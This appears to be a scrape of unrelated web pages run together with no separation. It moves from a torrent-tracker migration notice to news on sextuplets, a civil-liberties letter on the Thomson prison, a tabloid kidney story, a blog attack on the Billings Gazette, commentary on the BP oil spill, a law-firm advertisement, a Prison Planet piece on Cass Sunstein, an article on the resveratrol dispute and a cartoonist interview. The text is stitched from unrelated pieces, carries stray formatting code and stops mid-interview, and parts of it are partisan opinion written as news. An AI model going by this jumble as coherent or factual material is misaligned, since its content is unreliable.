Easy , we want to advance beyond the constraints of offering one company 's games , and we do n't want to split our userbase among two sites to do it .
This will be a gradual process instead of an instantaneous action though , NTorrents will stay open as an archive until we get our most dedicated users to switch over to PWNnetwork .
Sign up with PWN will be separate from NT , so yes , you will lose all of your stats .
Do n't worry too much though , for an undetermined amount of time after the site goes live , we will support an integration processes where we will transfer your upload and download stats from NT to PWN .
Everything else will be lost .
Now that we 've gotten that out of the way , I have more news .
After our raffle is closed , and we 've gotten the prizes to the winners sent out , we will also be issuing beta access to PWN to every person who purchased a ticket in the raffle .
This will be a beta period , in order for a decent amount of users to test the site , pitch ideas , and help work out issues before PWN officially goes live .
So , if you do n't want to wait until we launch the site to check out what PWN has to offer , go buy that ticket !
Not only will you get into PWN early , but you will have a chance to win one of those great prizes .
We appreciate everyone in our community , and we hope , even though the NT journey will be ending , that we will continue being awesome through PWN .
//Staff
A public launch date for the new tracker is yet to be confirmed .
However , one thing is certain – PWN will have a head start with the backing of large user base , experienced staff , uploaders and Nintendo / XBOX360 torrents that NT already has .
At the time this post is being written , nTorrents has over 17500 active users and nearly 4000 torrents .
Either way we wish this new tracker the best of luck and will post updates when / if it opens registrations or any form of recruitment anytime soon .
PWN Details :
Site Name : PWNnetwork ( http://pwnnetwork.net)
Signup URL : N / A
Other :
The favicon on the page suggests they are using resources for XTorrents ( XT ) for the new site .
n Torrents Details :
Site Name : NTorrents ( http://ntorrents.net)
IRC Invites Channel : irc://irc.ntorrents.net:6667/nt-invites
Related Articles
Woman gives birth to sextuplets in Oxford
The babies were born more than three months early A woman has given birth to sextuplets 14 weeks early at the John Radcliffe Hospital in Oxford .
Vicky Lamb , 31 , gave birth to four girls and two boys , ranging in weight from 1lb 5 oz ( 0.6kg ) to 1lb 15 oz ( 0.9kg ) .
Mrs Lamb , of Oxford , who had fertility treatment , is said to be recovering well following the birth on 14 May .
The babies are in intensive care and doctors have said the next few days will be " critical " .
Publicist Max Clifford , who is representing the family , said Mrs Lamb became pregnant after taking the same fertility drug she used before the birth of her first child , Gracie , now aged five .
They are fighting for their lives
Publicist Max Clifford
" They are just incredibly grateful for the John Radcliffe Hospital , the doctors and the nurses , " he said .
Talking about when Mrs Lamb and her husband Andy , also 31 , might be able to take their babies home , Mr Clifford said : " It is a long way off .
" They are fighting for their lives , they are still critical . "
The hospital said sextuplets were born once in every 4.5 million pregnancies .
Last year a woman gave birth to six babies at the Royal Jubilee Maternity Hospital in Belfast .
Staff ' privileged '
Before that the last surviving sextuplets in the UK were born in 1993 , according to the Multiple Births Foundation charity .
The John Radcliffe Hospital said : " Staff ... feel privileged to play their part in such an unusual birth .
" A large team of doctors and nurses were present at the delivery or involved with the immediate management of the babies .
" There were several weeks of planning the delivery prior to the birth . "
Consultant neonatologist Dr Kenny McCormick said : " Babies that are born this early need a lot of specialist care .
" They are receiving round - the - clock intensive care and specialist nursing at the moment and their condition is constantly monitored . "
Keith Reed , chief executive of the Twins and Multiple Births Association , said it was " truly amazing news " .
He added : " We waited for decades for the birth of sextuplets in the UK and now two sets have now been born within the space of the year .
" Families in this situation face a rollercoaster of emotions and we all wish the whole Lamb family well . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Civil Liberties Groups Oppose Obama ’s Plan to Close Gitmo , Absent Serious Changes
Created : April 08 , 2010 12:51 | Last updated : July 31 , 2020 00:00
In an indication of the full - spectrum pressure that the Obama administration is facing on its plan to close Guantanamo Bay , today a coalition of major civil liberties groups — the very groups that have led the charge to close the island detention facility since its 2002 inception — sent a pained letter to Congress urging members to oppose the planned closure unless President Obama drastically modifies his approach .
The Pentagon is seeking about $ 350 million in its Afghanistan funding authorization to buy the Thomson Correction Center in Illinois .
According to a senior administration official who briefed reporters on the plan to close Guantanamo in December , the facility will house detainees either convicted by military commissions or held in some form of indefinite detention without charge .
To civil libertarians , that would entrench some of the most intolerable legal abuses of Guantanamo Bay in the name of ending it , rendering the shutdown of the facility Pyrrhic at best and misleading at worst .
Sen. Mitch McConnell ( R - Ky. ) , the Senate GOP leader , no fan of closing Guantanamo , has questioned the value of exporting Guantanamo practices to Illinois instead of ending them outright .
In the new and delicately worded letter , eight civil libertarian organizations come to the same reluctant conclusion , and urge legislators to vote against the Thomson purchase unless they also pass a “ permanent , statutory ban on using the Thomson facility for indefinite detention without charge or trial or for military commission - related detention . ”
That would earn the blessing of a coalition that “ strongly support[s ] the responsible closing of the Guantanamo Bay detention facility ” and takes pains to praise “ many of the steps the Obama Administration has taken ” to close Guantanamo “ the right way , ” either through “ repatriation and resettling ” of detainees or trying them federal civilian court .
“ Bringing the practice of indefinite detention without charge or trial to any location within the United States will further harm the rule of law and adherence to the Constitution , ” reads a letter signed by the Alliance for Justice , American Civil Liberties Union , Amnesty International USA , Center for Constitutional Rights , Japanese American Citizens League , National Association of Criminal Defense Lawyers , Physicians for Human Rights , and the United Methodist Church ’s General Board of Church and Society .
“ The current statutory ban on transferring detainees to the United States for purposes of indefinite detention without charge or trial expires at the end of the current fiscal year .
Congress should not move forward with the Thomson purchase until and unless it permanently prohibits indefinite detention and military commission - related detention at the Thomson facility . ”
The letter is the first concerted forceful statement of position to Congress from civil libertarians who have expressed months ’ worth of discomfort with the contours of the Thomson - based Guantanamo closure plan — or what detractors call “ Gitmo North . ”
But it evidently did not win the support of other prominent civil liberties groups like the Constitution Project , Human Rights Watch and Human Rights First .
Here ’s the full text :
TO : Members of the U.S. Senate
Members of the U.S. House of Representatives
FROM : Alliance for Justice
American Civil Liberties Union
Amnesty International USA
Center for Constitutional Rights
Japanese American Citizens League
National Association of Criminal Defense Lawyers
Physicians for Human Rights
United Methodist Church , General Board of Church and Society
DATE : April 8 , 2010
RE : Opposition to the Purchase of the Thomson Correctional Center in Thomson ,
Illinois — Unless Congress Also Enacts a Permanent , Statutory Ban on Using the Thomson Prison for Indefinitely Detaining Persons Without Charge or Trial , or for Holding Persons During Military Commission Trials or for Serving Sentences Imposed by Military Commissions
We urge you to oppose legislation authorizing , or appropriating federal funds for , the purchase of the Thomson Correctional Center in Thomson , Illinois , unless Congress , at the same time , also enacts a permanent , statutory ban on using the Thomson prison for indefinitely detaining persons without charge or trial , or for holding persons during military commission trials or for serving sentences imposed by military commissions .
All of our organizations strongly support the responsible closing of the Guantanamo Bay detention facility , and we would support using the Thomson facility for holding any detainees now at Guantanamo who may be charged , tried , or sentenced in federal criminal court .
However , we strongly oppose transporting the worst of Guantanamo policies — indefinite detention without charge or trial and military commissions — to a prison within the United States itself .
If used for one or both of these purposes , the purchase of the Thomson prison could result in institutionalizing and perpetuating policies that should instead end .
On December 15 , 2009 , President Obama signed a memorandum directing the Attorney General and Secretary of Defense to acquire and activate the Thomson prison for use by the Department of Defense in holding detainees currently at the Guantanamo Bay Naval Base and by the Department of Justice ’s Bureau of Prisons as a federal penitentiary for holding prisoners in high security , maximum security conditions .
According to a study by the Council of Economic Advisers last year , the Defense Department would control 400 of the 1600 cells at the Thomson prison .
The Bureau of Prisons would control the remaining cells .
On December 15 , a number of government officials provided further details on who would be , and who would not be , held in the portion of the Thomson prison designated for use by the Defense Department .
In a letter and accompanying questions and answers from the Deputy Secretary of Defense to Congressman Mark Kirk , the Defense Department stated that the Thomson prison would be used to imprison Guantanamo detainees whom the government is indefinitely detaining without charge or trial under a claim of detention authority based on the 2001 Authorization for Use of Military Force , and also Guantanamo detainees tried before military commissions or serving sentences imposed by military commissions .
However , the Deputy Secretary ’s answer to Congressman Kirk ’s questions stated that Guantanamo detainees charged and tried before federal criminal courts would not be housed at the Thomson prison .
Further , in a briefing by a “ senior administration official ” on December 15 , the official stated that Guantanamo detainees cleared for release would remain at Guantanamo until transferred to other countries , and would not go to Thomson .
There is a right way and a wrong way to close Guantanamo .
To date , many of the steps the Obama Administration has taken — with the support of many members of Congress , including prominent congressional supporters of the Thomson purchase –have been in the direction of closing Guantanamo the right way .
The Obama Administration has worked hard to make charging decisions for detainees whom the government believes should be prosecuted in federal criminal courts in the United States , has closely collaborated with important allies of the United States in repatriating and resettling detainees cleared for release , and has continued the process of clearing detainees for release or transfer .
The Obama Administration should continue all of these steps until the population at Guantanamo reaches zero .
However , there are two developments over the past year that constitute closing Guantanamo the wrong way .
First , the government has reinstituted the discredited military commissions .
The military commissions have now gone through eight years , two statutes , four sets of rules , but have only resulted in three convictions , with two of those convicted detainees now released .
By contrast , more than 400 defendants have been convicted of terrorism - related offense in federal criminal courts .
The military commissions still do not have any rules based on the new statute , continue to have fundamental problems that could result in their proceedings being held illegal under the Constitution and international law , and deservedly lack credibility both at home and abroad .
Second , the government continues to claim authority to indefinitely detain without charge or trial some of the Guantanamo detainees .
Even if there is legal authority to continue to indefinitely detain these men , which many of our groups dispute , the government should make the policy decision that the interests of the United States are better served by either charging a detainee in federal criminal court or repatriating or resettling the detainee .
Based on the government ’s own statements , it appears that the Defense Department - run portion of the Thomson prison would house only those Guantanamo detainees being held pursuant to Guantanamo policies that should end — namely , military commissions and indefinite detention without charge or trial .
Congress should not authorize , or appropriate money for the acquisition of the Thomson prison unless it also enacts a permanent statutory provision that would ensure that the Thomson prison will not become a U.S. - based prison dedicated to perpetuating Guantanamo policies that should end .
Bringing the practice of indefinite detention without charge or trial to any location within the United States will further harm the rule of law and adherence to the Constitution .
Shortly after President Obama took office , the government charged , tried , and convicted the only person then - held on U.S. soil indefinitely without charge or trial .
At present , the number of people held within the U.S. itself indefinitely without charge or trial is zero .
However , if the Thomson prison is acquired and the current statutory prohibition on transferring Guantanamo detainees for purposes other than prosecution is allowed to expire , the number of persons held on U.S. soil without charge or trial could reportedly rise to 50 or more .
Moreover , Thomson could eventually become the place to send other persons held indefinitely without charge or trial — with the prospect of detainees being transferred there from Bagram , Afghanistan or new captures brought from other locations around the globe .
The unfortunate reality that we would face if Thomson opens is that it is easier to go from 50 to 51 indefinite detention prisoners than it is to go from 0 to 1 .
Once the indefinite detention policy is institutionalized at Thomson , it will be difficult to hold the line at former Guantanamo detainees .
We urge that you oppose the purchase of the Thomson prison unless Congress , at the same time that it authorizes or funds the purchase , also enacts a permanent , statutory ban on using the Thomson facility for indefinite detention without charge or trial or for military commission - related detention .
The current statutory ban on transferring detainees to the United States for purposes of indefinite detention without charge or trial expires at the end of the current fiscal year .
Congress should not move forward with the Thomson purchase until and unless it permanently prohibits indefinite detention and military commission - related detention at the Thomson facility .
We would be very interested in meeting with you or your staff to discuss this issue further .
* Update , 1:06 p.m. : * The Government Accountability Project is a last - minute signatory , bringing the total number of groups signing the letter to nine .
Surgeons cut open girl , five , to fix failing kidneys only to find two new ones growing in their place
A girl left seriously ill when both her kidneys failed astounded medical experts by growing two new ones .
Angel Burton suffered from painful kidney infections from birth to the point where she required surgery at the age of five .
But surgeons were amazed to discover the little girl had four kidneys , with two new fully - formed organs sitting on top of her old ones .
Angel Burton now aged eight .
Her mother Claire said : ' It 's a real miracle .
It 's absolutely amazing that none of her earlier scans picked the extra kidneys up .
We 're just so grateful to have Angel back to her happy , healthy self '
And the new ones had taken over the role of the others , meaning she was effectively ' cured ' of kidney failure .
Now , three years on , Angel , now eight , is fighting fit and her family are still thankful for the miracle that changed her life .
She has an rare condition known as ' duplex kidney ' - common to just a handful of people in Britain .
A duplex kidney is fused to the other at the centre and may share or have an independent ureter draining urine to the bladder .
In Angel 's case both her kidneys are ' duplex ' and fused to the other .
Each has a separate ureter , meaning that she has four kidneys and four ureters .
Angel ( pictured with her mother Claire ) in fancy dress .
She suffered from painful kidney infections from birth to the point where she required surgery at the age of five
Doctors believe the initial scans missed the extra kidneys because they sat immediately on top of each other and would have shown up as one .
Angel 's mother , Claire Burton , 32 , from Louth , Lincolnshire gave birth to her daughter in 2001 but within months her baby 's health started to decline .
Doctors performed tests and she was diagnosed with bilateral reflux , which meant that the valves to her bladder were n't working properly and urine was getting into her kidneys , causing infections .
Angel 's condition continued to be monitored and she was regularly screened for infections and given kidney scans .
On one check - up it was revealed her kidneys had suffered serious scarring and she would have to have an operation .
She underwent surgery at Sheffield Children 's Hospital in October 2007 to create an artificial valve but during the operation doctors spotted the extra kidneys .
Mrs Burton , who has two other children with husband of ten years , Michael , said : ' They 'd been in there an hour and a quarter when the surgeon came out .
He said : ' We 've found something very , very strange considering the amount of scans Angel 's had this year . '
' He went on to explain they 'd put a camera in Angel 's bladder so they could repair the valves .
They 'd found the two openings that were supposed to be there and they 'd gone ahead and repaired the two valves .
' But then they 'd found two more openings and when they 'd put the camera up , these openings led up to two more perfectly healthy kidneys , just sitting on top of the other ones .
' He said : ' They are totally independent .
We are just stunned that these have never been picked up on a scan .
She 's been having intensive scanning for five years and they 've never shown up .
It looks like the healthy ones have taken over . ''
She said : ' It 's a real miracle .
It 's absolutely amazing that none of her earlier scans picked the extra kidneys up .
We 're just so grateful to have Angel back to her happy , healthy self . '
With her extra kidneys doing all the work of her old ones , Angel , now eight , is fully recovered and looking forward to a healthy future .
As many of you already know , earlier this month , two medical marijuana businesses were firebombed in Billings , Montana .
One of my best friends lives over there , and I will never forget his text message talking about how it sent a chilling effect around the whole state .
While it seems like the heinous crimes have kept some medical Montanans from speaking out for fear of attack , it sure has n’t slowed down the number of people seeking medical cards .
Just yesterday , a clinic in Billings drew over 300 people .
Regardless of how Montanans feel about medical marijuana , one thing is for sure ; it is n’t going away , and the program will continue to grow .
I guarantee this will happen , despite the best efforts by the Billings Gazette to bring harm to caretakers in the city .
Why do I make this allegation against the Billings Gazette ?
Because the newspaper published a detailed map of not only every current caretaker in Billings , but also potential caretakers , just two days after the firebombings !
What the f#ck ?
Let me get this straight Billings Gazette ; two very violent acts were committed against legitimate businesses , and rather than make society a safer place , you post a detailed map giving the arsonists more targets ?
That would be like posting the addresses of wealthy Billings residents in the midst of a string of violent robberies at banks .
The Billings Gazette might try to say something like , ‘ we were just trying to inform readers about the prevalence of medical marijuana in the city . ’
OK , well then why the hell are there pictures of the homes / facilities with detailed addresses ?
Could n’t you have said the number of caretakers , describe how uniformly spread out they are around the city , and leave it at that ?
The only reason to get so detailed with the map is to encourage more violent acts , period .
I am calling for a boycott of the Billings Gazette for their immoral practices .
The only reason people should have anything to do with them is to write the Billings Gazette staff , and tell them that society does not want to re-live the failed ‘ reefer madness ’ strategies of the past .
I did n’t post a link to the map in this article because I do n’t want to be a part of spreading violent hate .
If you want to see it for yourself , it is not hard to find on a Google search , but you wo n’t find it on my website .
To the medical patients and caretakers in Montana — keep your head up , your security at full alert , and your head as clear as possible … there is a lot of discrimination against you in Montana for some reason , and even the media is in on it … BEWARE !!
What I believe is going on is that BP is running a series of " junk shots " with the Nat Lab " junk " , and after they run one they fill the well with mud to see if it has changed anything .
To date , while there are changes ( you stop doing this when there are n't ) they have n't been enough .
But after each time that they fill the well with mud , they switch the pumps off while they go and regroup .
That allows the gas and oil to push the mud back out of the way ( one of these tries , perhaps , it wo n't and we will know that it has worked ) .
Much more under the fold , including video .
( Click " there 's more " ) .
" The ( Development Driller II ) has temporarily suspended drilling operations in preparation for the possible future deployment of its BOP on top of the ( Macondo ) BOP , " he told UpstreamOnline in an email response .
But when the oil and gas get through the constriction of the BOP there is a drop in pressure and an expansion , and this gives that little bit of excitement that we see .
After a while , not so exciting , though this time one of the cameras went off air , so maybe there was something else going on as well ??
Oh , and BP has decided to halt , for a while , the second drilling of a relief well , so that they can prepare for plan B .
One has to remember that these drilling rigs are at a premium , and there is an opportunity cost with just about every decision . : 10:53 pm .
It appears that they are pumping mud again , so another test may be under way .
( I am judging this on texture and jet structure ) .
There is one interesting thing to note , and you have to be familiar with the patterns to see it .
So I am going to repeat a picture from 3:45 am yesterday ( which has been my standard base reference for mud , rather than oil flows .
3:45 pm 5/26/2010
Now look at the current flow :
10:59 pm 5/28/2010
Notice the changes in the flow pattern , and particularly that the crack to the right of the central paint removed line , which had a piece of rubber jammed in it .
By adding more NL junk they have just about totally bridged that crack and stopped the flow - which illustrates that what they are trying to do at the BOP is at least partially working - as I explained in an earlier post I am almost tempted to note that the flow seems at a little less pressure , judged again by jet structure , and which would indicate more bridging in the BOP , but I grow more cautious as the process extends .
And one last point - you should not expect the majority of the cracks at the riser ( the ones we are looking at ) to get closed until almost the end of the injections since their width is much smaller than the one that they are trying to block in the BOP , but as it grows smaller , so they should come into the range of the NL " junk . "
Unfortunately they do n't seem to have got the main flow bridged effectively yet , and it may be that the gap is wider than the thickest piece of tire they have tried so far .
Which now gets into tricky territory as there are absolute limits on how big they can make the pieces .
But this is a problem where a tenth of an inch can make a big difference .
The Moore Law Firm , PC
Theresa M. Moore has provided her clients trusted legal representation at trial and on appeal for 32 years .
The Moore Law Firm , PC helps solve problems and disputes arising in estate , trust and probate matters , including estate administration .
Common issues in probate litigation :
Will contests
Capacity & undue influence issues
Rights of surviving spouses & heirs
Common law spouse status
Trust Administration
Trust Communication
Management and distribution of assets
Trust Accounting
Creditors ’ claims in probate , against trusts , against conservatorship estates
Defense of fiduciaries ( personal representatives , trustees , guardians , conservators , agents under medical and general powers of attorney )
Construing trusts and wills
When you need experienced , professional and personal service from your lawyer , contact me .
If you need attorneys to assist with probate litigation , The Moore Law Firm , PC can help .
Call ( 303 ) 351-5626 for an initial consultation or contact us through our Web site .
But , while previous studies have highlighted the health - giving properties of wine , the authors of the latest report sounded a note of caution .
Drinking modest amounts of alcohol does not necessarily make you healthier , they said .
Rather , those who enjoy alcohol without indulging to excess tend to be wealthier and more successful than average , and are the sort of people who look after their health in general .
Cass Sunstein , who wrote a white paper calling for “ conspiracy theories ” to be banned , wants to legally force Americans to “ do what ’s best for our society ” and dilute their own free speech
Paul Joseph Watson
Prison Planet.com
Monday , May 17 , 2010
Disturbing audio has emerged of White House information czar Cass Sunstein , who in a previous white paper called for banning “ conspiracy theories , ” demanding that websites be mandated by law to link to opposing information or that pop ups containing government propaganda be forcibly included on political blogs .
In an audio excerpt of an interview which was posted on the Breitbart. tv website today , Sunstein discusses how conservative websites should provide links to liberal websites and vice versa or even how political blogs should be made to include pop ups that show “ a quick argument for a competing view ” .
Sunstein said that if this system could n’t be implemented voluntarily , “ Congress should hold hearings about mandates , ” which would legally force people to dilute their own free speech .
The Harvard Professor also said that blogs should be forced to list a random draw of 25 popular websites , such as CNN.com .
Listen to the clip below .
A d v e r t i s e m e n t
“ The best would be for this to be done voluntarily , ” said Sunstein , “ But the word voluntary is a little complicated and people sometimes do n’t do what ’s best for our society , ” he added ( emphasis mine ) .
“ The idea would be to have a legal mandate as the last resort …. an ultimate weapon designed to encourage people to do better , ” Sunstein concluded .
As we previously reported , in a January 2008 white paper entitled “ Conspiracy Theories , ” the Harvard Professor who is currently President Obama ’s head of information technology in the White House called for “ conspiracy theories , ” that is any political opinion which did n’t concur with the establishment view , to be taxed or even banned outright .
( ARTICLE CONTINUES BELOW )
In a set of proposals designed to counter “ dangerous ” ideas , Sunstein suggested that the government could , “ ban conspiracy theorizing , ” or “ impose some kind of tax , financial or otherwise , on those who disseminate such theories ” .
So - called “ conspiracy theories that Sunstein said could be subject to government censorship included beliefs held by the vast majority of Americans , such as the notion that the JFK assassination occurred as part of a wider plot .
In his white paper , Sunstein also cited the belief that “ global warming is a deliberate fraud ” as another marginal conspiracy theory to be countered by government censorship .
Ludicrously , the Harvard Professor even characterized as “ false and dangerous ” the idea that exposure to sunlight is healthy , despite the fact that top medical experts agree prolonged exposure to sunlight reduces the risk of developing certain cancers .
Essentially , Sunstein wants it to be written into law that the government can dictate the very nature of reality to Americans and that their opinions can only be voiced at best when accompanied by mandatory federal propaganda or at worst that Americans can be silenced entirely by federal decree .
This callous disregard for the First Amendment represents a fundamental threat the very fabric of the country and is even more alarming considering the position of Obama ’s Supreme Court nominee Elena Kagan with regard to free speech .
During the Citizens United vs. FEC case , Kagan ’s office argued that the government can ban books and political pamphlets .
In separate writings , Kagan argued that the government could “ disappear ” free speech it deemed to be offensive .
This article was posted : Monday , May 17 , 2010 at 10:30 am
Print this page .
Infowars.com Videos :
Comment on this article
“ Is it schadenfreude , or is it something else ? ”
It is a question Harvard professor David Sinclair asks himself a lot of late .
No wonder .
Just about everyone doing cell biology has something — and usually critical — to say of him these days .
There are loudmouth bloggers calling fraud and normally circumspect colleagues spouting uncomfortable questions about his work .
All of this is something new for Professor Sinclair , a soft - spoken man whose calm visage belies his world - rocking discovery of just 10 years ago : that resveratrol , a compound made from an extract of common red wine , significantly expands the lifespan of laboratory mice .
Fortunately , or unfortunately , the finding has fueled a powerful , if perhaps misplaced , 21st century obsession : immortality , and how to get it .
It has also made David Sinclair a rich man .
In 2008 , the pharmaceutical giant Glaxo paid $ 720 million for the rights to his research , which it hoped to use as a diabetes drug .
Some time later Sinclair signed a contract with the marketing giant Shaklee to use his name to sell resveratrol .
( The deal was later unstrung when opprobrium set in . )
There was talk of a Nobel Prize .
Hence , the minor possibility that jealousy might lurk behind a roiling scientific brouhaha centered on one explosive charge : That Dr. Sinclair ’s data and his laboratory methods are so flawed as to make resveratrol a doubtful elixir of youth - at worst completely unusable , and at best a highly troublesome drug candidate .
The criticism , now churning everywhere from the blogosphere to the top scientific journals , has stung hard .
“ Where does all that come from ? ” Sinclair says , his gentlemanly bearing ruffled .
“ They are prematurely piling on a young science that will potentially have enormous benefits . ”
But those benefits are seriously under attack .
Among them :
-- Subsequent studies have shown that resveratrol does not extend lifespan in normal , normally fed mice
-- Others have shown that at least one Sinclair compound does not improve diabetes — a key claim in the Glaxo acquisition
-- still others show that the compound does not does not work in the targeted fashion initially reported , raising the prospect that it may be too “ dirty ” of a candidate for pharmaceutical development
That the criticism on the scientific blogosphere has been particularly rancid is unsurprising .
But read between the lines of some of the field ’s top research journals and you can see what really rankles .
Citing a new study that may seriously undermine Sinclair ’s most fundamental bench science last month , the editors of the Journal of Biological Chemistry noted , “ [ this ] highlights the importance of performing careful and thorough biochemical methods with clear and unbiased analysis . ”
It might be said that that was essentially a form of scientific bitch - slapping .
Now even his colleagues at Harvard have taken to ribbing him , sometimes not so gently .
Presenting a PowerPoint to a group of university alumni recently , Gary Ruvkun , a fellow molecular biologist , has been getting laughs with one particular slide that proclaims : “ Do n’t believe anything you ’ve heard about resveratrol ! ”
At the core of the controversy is a subject that rarely percolates down from the lab bench — the legitimacy of certain artificial chemicals used to determine how any given candidate molecule works .
Does it trigger any known disease pathways ?
Does it suppress that activity or increase it ?
David Sinclair at the 2008 - 2009 NIEHS Distinguished Lecture Series on August 11 , 2009 .
Sinclair is professor of Pathology and co-director of the Paul F. Glenn Laboratories for the Biological Mechanisms of Aging at Harvard Medical School .
Photo : Steve McCaw
In 2000 , Dr Sinclair and his colleagues reported that resveratrol specifically triggered the SIRT family of enzymes that are critical to the regulation of energy , and hence , to aging , metabolic disease and diseases of uncontrolled growth , like cancer .
Resveratrol seemed to accomplish this in a very “ clean ” fashion .
Such specificity is critical to the successful development and approval of any new drug ; compounds that lack specificity and trigger lots of other mechanisms are hard to get past the FDA because they may cause side effects and adverse events .
( Although Viagra , initially developed for angina , has been a just a little successful with something once considered a side effect . )
Sinclair ’s discovery tool was a relatively new commercial assay , or “ probe , ” called Fleur de Lys .
Like similar chemicals in use for at least a decade , Fleur de Lys inserts itself like a big thermometer into the outer membrane of a cell .
There , it can react with whatever cellular enzyme or gene product it is designed to target .
When it does , the top of the probe then glows under an ultraviolet light , allowing the researcher to see when a candidate molecule is hitting the right target .
( The probe signals are known as florophores . )
That is exactly what happened in 2000 , when Dr Sinclair exposed a cell to resveratrol , then exposed it to the probe for SIRT .
Thus came the famous finding that resveratrol worked by regulating the sirtuin family of enzymes , mimicking the anti-aging properties of caloric restriction , to this day the only intervention that alters maximum lifespan in a mammal .
Since 2005 , however , substantial concern about the Fleur de Lys probe led several researchers to doubt — if not entirely discount — its utility , especially as a probe for SIRT activation .
Scientists at the University of Washington compared the florescent probe to other natural probes , known as native substrates .
They found that , without the presence of the unnatural florophore , resveratrol did not activate SIRT .
“ We could n’t reproduce the in vivo data from Sinclair ’s 2003 paper claiming 70 percent lifespan extension in yeast from resveratrol , nor did we observe activation of 2 , ” says Matt Kaeberlein , a geneticist at UW .
“ I do n’t know if David knew about the substrate specificity of resveratrol before we published our paper , but I think it ’s unfortunate that they never addressed the issue afterward . ”
It ’s not unethical to continue to use the assay because no Petri dish assay perfectly mimics what is occurring inside the body , he says , but , at the very least , “ the editors and referees who handled the subsequent papers should have asked them to provide evidence that the compounds directly activate SIRT1 . ”
Last year , a study by researchers at Amgen showed something similar :
That resveratrol only worked in the presence of another completely different enzyme system , again calling into question the compound ’s critical ability to target a single clean drug pathway .
And this year a study by researchers at Pfizer , a major Glaxo competitor , repeated the Fleur de Lys florophore test and found that four Sinclair compounds “ are not direct activators of SIRT1 . ”
They also reported that one of the compounds , SIRT 1720 , neither improves blood sugar levels nor increases energy — two key resveratrol claims .
The conclusion : resveratrol ’s ability to target SIRT was nothing but an artifact of the Fleur de Lys test — something completely unrelated to reality .
It would be like getting a false positive on a pregnancy test strip that was way beyond its expiration date .
Sinclair bridles at that .
“ This is a new a complex science , ” he says .
“ Historically people have called complexity an artifact , and often they are wrong . ”
He points to some of the initial papers about another now - established finding : that mutations in the gene known as daf1 lead to lifespan expansion in many life forms .
“ Originally , people said this was an artifact , applicable only to worms .
They were wrong .
It extends from yeast to mice . ”
He notes that one of his present critics was the researcher who made that very mistake in the mid-1990s
Still , Professor Sinclair may be a little daunted , reviewing certain statements he made during resveratrol ’s early glow .
line - height :115%;mso-bidi-font-family :Calibri;mso-bidi-theme-font:minor-latin " >“ The upside is so huge that if we are right , ” he said after announcing the Glaxo deal in 2008 , ” the company that dominates the sirtuin space could dominate the pharmaceutical industry and change medicine . ”
UW ’s Kaeberlein admits resveratrol “ could certainly still turn out to be valid , ” but remains convinced that it does not activate SIRT in yeast “ because we have rock solid assays for that …we do n’t have them for mammals . ”
A growing body of work also raises a bigger question :
Does resveratrol work at all to expand lifespan through SIRT ?
Some evidence suggests not , or that , at best , it may do so in very idiosyncratic ways .
When the compound was tested on mice that ate a normal diet ( as opposed to his original cohort of mice on a high - fat diet ) , there was no expansion of lifespan .
Again , the effect may have been an artifact of the high fat diet , laced with tropical oils .
Even fly and worm studies have proven difficult to reproduce in disinterested laboratories .
And again , the issue lies in the usually skimmed realm of journal articles called “ materials and methods . ”
But they have nevertheless added fuel to the artifacts charge .
It is nothing new , of course , that science — like Lady Gaga or Cher — can be a mean taskmistress .
But Sinclair has been surprised by the heated nature of what he regards as an unwarranted attack .
What , beyond jealousy , might be fueling it ?
He suggests one possibility : his patent on the basic processes underlying even more lucrative enzyme - based drug development .
“ Remember , ” he says , “ my detractors have something at stake in this kerfuffle too .
They have old , established ways of developing compounds .
They have an interest in beating up on new ways . ”
Sinclair remains confident that the entire contretemps will turn out to be nothing but a “ stupid ” overreaction .
He has been aware of the florophore concerns since 2005 , he says , and they were disclosed to Glaxo during its extensive due diligence on the deal .
( Glaxo has publically stood by their commitment to develop the Sinclair compounds , but has to date been unwilling to prove that they knew about the florophore issues at the time of the deal . )
He is now working on a new probe , and plans to publish two articles in the coming months that will address those concerns .
And if the compounds turn out to be dirty , just as his critics contend ?
“ Sure , it ’s preferable for it to be narrowly targeted , but it ’s not really essential , ” he says .
” Think of… aspirin . ”
Greg Critser is the author , most recently , of Eternity Soup : Inside the Quest to End Aging ( Harmony , 2010 ) Fat Land : Why Americans are the Fattest People in the World ( Houghton / Mifflin , 2003 ) , and Generation Rx ( Houghton / Mifflin 2005 ) .
1 1 . Rolling Bridge
Background : UK - based design firm Heatherwick Studio created this 39 - foot timber and steel bridge in 2004 to act as a walkway over a small section of London 's Grand Union Canal .
Why It 's Innovative : A hydraulic system built into the bridge 's handrail allows it to retract and curl into an octagon .
The retractable design allows for boats to cruise through the canal unobstructed , and the bridge rolls up every Friday at noon .
Donald MacDonald , an architect with more than 40 years of experience who has worked on over a dozen bridges , tells PM that , " this bridge represents an experimental gesture , and it 's really complicated for what it does . "
Rick Smith Rick Smith Rick Smith Rick Smith Rick Smith
Rick Smith is the cartoonist behind Yehuda Moon , a daily online comic strip .
BikeRadar caught up with the 36 - year - old insurance company web developer , of Shaker Heights , Ohio , just as the married father of two launched his second Yehuda Moon book , based on the strip ’s last six months .
Advertisement
BikeRadar :
Who ’s better – Bill Watterson ( Calvin & Hobbes ) or Charles Schulz ( Peanuts ) ?
Rick Smith : Gosh , both Watterson and Schulz captured children so well , each in their own way .
I probably return to Schulz more , but find Watterson more humorous .
I admire and read Harold Gray ( Little Orphan Annie ) , Chester Gould ( Dick Tracy ) and Frank King ( Gasoline Alley ) as much , if not more .
Your first Yehuda Moon strip appeared on 22 January , 2008 .
What prompted you to publish a daily strip online ?
Rick Smith
The first Yehuda Moon comic strip appeared on 22 January , 2008
I had started commuting by bicycle again and figured I had enough ideas for a few comic strips .
Those few quickly grew to 30 strips , and I just kept going .
I have biked to school or work off and on throughout my life ; I ’ve also drawn comics off and on… the two pursuits finally came together .
‘ Draw what you know ’ became a mantra I actually tried to stick to .
What ’s your background ?
You certainly have a distinctive style , and you seem to know bikes …
I need to know a lot more about bikes .
The readers know bikes !
I know about classic bikes , and new bikes with traditional gear .
But I ’m learning about new technology now – mostly through the character of Joe King ( Yehuda Moon ’s foil ) , a roadie who owns the Kickstand Cyclery with Moon .
Rick Smith
I have colleagues who know more and teach me , and I read more about different niches in the bicycling world than I did when I started the comic .
( Smith purchased the entire Rivendell Reader catalog on eBay , and subscribes to the same ideology as Rivendell owner Grant Petersen , reflected in the comic strip ed.}
How long does each strip take to produce ?
I usually spend a little more than 2 hours on each comic .
Writing and editing take the longest time .
Depending on what ’s going on in the strip for that day , penciling it can take anywhere from 20 minutes to 35 minutes .
And then inking , scanning , colouring and lettering takes another 40 minutes .
Rick Smith
How do you produce them ?
